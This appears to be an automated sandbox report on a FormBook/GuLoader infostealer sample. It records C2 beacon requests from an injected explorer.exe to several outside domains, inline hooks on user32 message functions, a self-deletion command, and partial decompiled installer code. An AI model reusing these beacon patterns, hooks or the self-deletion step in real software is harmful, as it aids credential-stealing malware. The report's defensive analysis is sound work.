0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49875	107.148.83.209	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:37:50.212547064 CEST	2779	OUT	GET /ms14/?1b-=Wkneoq9l7j621GOHWXUj6c6StoZcfXIkvhnfDRklCPhPpoBwnB0eenfjXWBkChp12+Xn&5jjx=X41P HTTP/1.1 Host: www.zbjcolwy.cfd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:37:50.383443117 CEST	2781	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Aug 2023 18:37:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 65 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 34 6a 4d 47 64 47 78 58 77 32 62 76 52 32 77 22 2c 63 6b 3a 22 4b 34 6a 4d 47 64 47 78 58 77 32 62 76 52 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e5 85 a8 e5 9b bd e5 ae 98 e6 96 b9 e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 37 62 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 72 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 2f 73 65 6f 2f 73 6b 69 6e 2f 69 6d 61 67 65 2f 34 30 30 2e 6a 70 67 27 29 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 68 65 72 6f 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 73 Data Ascii: 1efd<!DOCTYPE html><html><script>LA.init({id:"K4jMGdGxXw2bvR2w",ck:"K4jMGdGxXw2bvR2w"})</script> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title></title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f5f5f5; } .header { background-color: #007bff; color: #fff; padding: 20px; text-align: center; font-size: 32px; font-weight: bold; letter-spacing: 1px; } .hero-image { background-image: url('/seo/skin/image/400.jpg'); height: 200px; background-position: center; background-repeat: no-repeat; background-size: cover; position: relative; } .hero-text { text-align: center; position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #fff; font-size: 40px; font-weight: bold; text-s
Aug 2, 2023 20:37:50.383543968 CEST	2782	IN	Data Raw: 68 61 64 6f 77 3a 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 38 29 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 63 6f 6e Data Ascii: hadow: 2px 2px rgba(0, 0, 0, 0.8); letter-spacing: 4px; } .container { margin: 10px auto; padding: 20px; background-color: #fff; box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2); max-width:
Aug 2, 2023 20:37:50.383626938 CEST	2783	IN	Data Raw: 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 63 61 6c 6c 2d 74 6f 2d 61 63 74 69 6f 6e 3a 68 Data Ascii: display: inline-block; margin-top: 30px; } .call-to-action:hover { background-color: #0062cc; } a { text-decoration:none; } </style> </head> <body> <div class="header">
Aug 2, 2023 20:37:50.383687973 CEST	2784	IN	Data Raw: 86 e8 a7 a3 e5 92 8c e8 af a2 e9 97 ae e7 9b b8 e5 85 b3 e4 bf a1 e6 81 af ef bc 8c e6 af 94 e5 a6 82 e4 bb b7 e6 a0 bc e3 80 81 e4 bc 98 e6 83 a0 e3 80 81 e6 8a 80 e6 9c af e6 94 af e6 8c 81 e7 ad 89 e3 80 82 e5 a6 82 e6 9e 9c e4 bd a0 e6 98 af Data Ascii:
Aug 2, 2023 20:37:50.383780956 CEST	2786	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e e4 bb 8e e6 9c ac e6 96 87 e4 b8 ad e6 88 91 e4 bb ac e5 8f af e4 bb a5 e7 9c 8b e5 87 ba ef bc 8c 20 e5 85 a8 e5 9b bd e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d e6 98 af e4 b8 80 e4 b8 aa e4 b8 93 e4 b8 9a e7 Data Ascii: <p>
Aug 2, 2023 20:37:50.383855104 CEST	2787	IN	Data Raw: 93 aa e5 84 bf ef bc 8c e5 8f aa e8 a6 81 e4 bd a0 e6 9c 89 e9 97 ae e9 a2 98 e9 9c 80 e8 a6 81 e8 a7 a3 e5 86 b3 ef bc 8c e9 83 bd e5 8f af e4 bb a5 e9 9a 8f e6 97 b6 e6 8b a8 e6 89 93 e7 94 b5 e8 af 9d ef bc 8c e5 be 97 e5 88 b0 e6 bb a1 e6 84 Data Ascii: </p> <h3>2. </h3> <p>
Aug 2, 2023 20:37:50.383933067 CEST	2788	IN	Data Raw: 8c e4 b8 8d e5 a6 a8 e8 af 95 e8 af 95 20 e7 9a 84 e5 ae a2 e6 9c 8d e7 94 b5 e8 af 9d e5 90 a7 e3 80 82 e6 88 91 e4 bb ac e7 9b b8 e4 bf a1 ef bc 8c e5 9c a8 e8 bf 99 e9 87 8c e4 bd a0 e4 b8 80 e5 ae 9a e8 83 bd e5 a4 9f e5 be 97 e5 88 b0 e6 9c Data Ascii: </p> <p><span style="color:red;"></span></p> <p STYLE="TEXT-ALIGN:CENTER; FONT-SIZE:20PX; "></p> <br> <p STYLE="

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49877	188.114.97.14	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:38:10.599622965 CEST	2795	OUT	GET /ms14/?1b-=h3fLfZ3xRyUaMvmJY+vXkDus6c4OoHicU91y3xWN8xaUQgPaFkGWnw7wqHbjUCdbn7CG&5jjx=X41P HTTP/1.1 Host: www.ypasbfxplu.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49878	45.77.219.226	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:38:31.526546001 CEST	2796	OUT	GET /ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P HTTP/1.1 Host: www.nihil.one Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:38:31.614872932 CEST	2797	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.23.0 Date: Wed, 02 Aug 2023 18:38:31 GMT Content-Type: text/html Content-Length: 145 Connection: close Location: https://www.nihil.one/ms14/?1b-=4tMVn6XiBHKuKW8VU2EIZ5B/qrpEFZzqaYDMFWWeQmJxL9kkTfJwlmrKp7OjJJRb95od&5jjx=X41P Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.23.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49881	185.238.87.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:39:12.203403950 CEST	2802	OUT	GET /ms14/?1b-=u3S/fUpBdl6P8b4ADNn+FVx0VEGCDPoJ7b9d+427u3NTiKr5dAp1QyZtAqVtC5y+GShx&5jjx=X41P HTTP/1.1 Host: www.lilith-con.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2023 20:39:12.246273994 CEST	2802	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 02 Aug 2023 18:39:12 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.lilith-con.com/ms14/?1b-=u3S/fUpBdl6P8b4ADNn+FVx0VEGCDPoJ7b9d+427u3NTiKr5dAp1QyZtAqVtC5y+GShx&5jjx=X41P Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xED

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wLlREXsA9M.exePID: 7392, Parent PID: 5560

General

Target ID:	0
Start time:	20:35:04
Start date:	02/08/2023
Path:	C:\Users\user\Desktop\wLlREXsA9M.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\wLlREXsA9M.exe
Imagebase:	0x400000
File size:	385'144 bytes
MD5 hash:	08DEFE80ACE1F032875C8127AE5E4481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1031033084.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1033536083.0000000004F47000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wLlREXsA9M.exePID: 7852, Parent PID: 7392

General

Target ID:	3
Start time:	20:35:14
Start date:	02/08/2023
Path:	C:\Users\user\Desktop\wLlREXsA9M.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\wLlREXsA9M.exe
Imagebase:	0x400000
File size:	385'144 bytes
MD5 hash:	08DEFE80ACE1F032875C8127AE5E4481
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1062248896.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1090665531.00000000324F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 5560, Parent PID: 7852

General

Target ID:	4
Start time:	20:35:22
Start date:	02/08/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff7897a0000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.5876788993.0000000010B5C000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: autochk.exePID: 8396, Parent PID: 5560

General

Target ID:	5
Start time:	20:35:27
Start date:	02/08/2023
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autochk.exe
Imagebase:	0xc80000
File size:	875'008 bytes
MD5 hash:	95127C028063423E1253BD0C8CD6C9CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: NETSTAT.EXEPID: 8548, Parent PID: 5560

General

Target ID:	6
Start time:	20:35:27
Start date:	02/08/2023
Path:	C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase:	0xc30000
File size:	32'768 bytes
MD5 hash:	9DB170ED520A6DD57B5AC92EC537368A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.5845901984.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.5845111818.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.5843391506.00000000007D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2108, Parent PID: 8548

General

Target ID:	7
Start time:	20:35:31
Start date:	02/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\wLlREXsA9M.exe"
Imagebase:	0x930000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4792, Parent PID: 2108

General

Target ID:	8
Start time:	20:35:31
Start date:	02/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff666080000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: wLlREXsA9M.exePID: 7392, Parent PID: 5560COMMON

Execution Graph

Execution Coverage:	18.1%
Dynamic/Decrypted Code Coverage:	14%
Signature Coverage:	22.3%
Total number of Nodes:	1504
Total number of Limit Nodes:	37

Executed Functions

Function 0040316D Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			_entry_() {
				intOrPtr _t45;
				CHAR* _t49;
				char* _t52;
				CHAR* _t54;
				void* _t58;
				intOrPtr _t60;
				int _t62;
				int _t65;
				signed int _t66;
				int _t67;
				signed int _t69;
				void* _t93;
				signed int _t109;
				void* _t112;
				void* _t117;
				intOrPtr* _t118;
				char _t121;
				signed int _t140;
				signed int _t141;
				int _t149;
				void* _t150;
				intOrPtr* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t158;
				char* _t159;
				void* _t162;
				void* _t163;
				char _t185;

				 *(_t163 + 0x18) = 0;
				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t163 + 0x20) = 0;
				 *(_t163 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t118 = E00406126(0);
					if(_t118 != 0) {
						 *_t118(0xc00);
					}
				}
				_t155 = "UXTHEME";
				do {
					E004060B8(_t155); // executed
					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
				} while ( *_t155 != 0);
				E00406126(9);
				_t45 = E00406126(7);
				 *0x423704 = _t45;
				__imp__#17(_t158);
				__imp__OleInitialize(0); // executed
				 *0x4237b8 = _t45;
				SHGetFileInfoA(0x41ecc8, 0, _t163 + 0x38, "true", 0); // executed
				E00405D8D(0x422f00, "NSIS Error");
				_t49 = GetCommandLineA();
				_t159 = "\"C:\\Users\\Arthur\\Desktop\\wLlREXsA9M.exe\"";
				E00405D8D(_t159, _t49);
				 *0x423700 = GetModuleHandleA(0);
				_t52 = _t159;
				if("\"C:\\Users\\Arthur\\Desktop\\wLlREXsA9M.exe\"" == 0x22) {
					 *(_t163 + 0x14) = 0x22;
					_t52 =  &M00429001;
				}
				_t54 = CharNextA(E0040582A(_t52,  *(_t163 + 0x14)));
				 *(_t163 + 0x1c) = _t54;
				while(1) {
					_t121 =  *_t54;
					_t168 = _t121;
					if(_t121 == 0) {
						break;
					}
					__eflags = _t121 - 0x20;
					if(_t121 != 0x20) {
						L10:
						__eflags =  *_t54 - 0x22;
						 *(_t163 + 0x14) = 0x20;
						if( *_t54 == 0x22) {
							_t54 =  &(_t54[1]);
							__eflags = _t54;
							 *(_t163 + 0x14) = 0x22;
						}
						__eflags =  *_t54 - 0x2f;
						if( *_t54 != 0x2f) {
							L22:
							_t54 = E0040582A(_t54,  *(_t163 + 0x14));
							__eflags =  *_t54 - 0x22;
							if(__eflags == 0) {
								_t54 =  &(_t54[1]);
								__eflags = _t54;
							}
							continue;
						} else {
							_t54 =  &(_t54[1]);
							__eflags =  *_t54 - 0x53;
							if( *_t54 != 0x53) {
								L17:
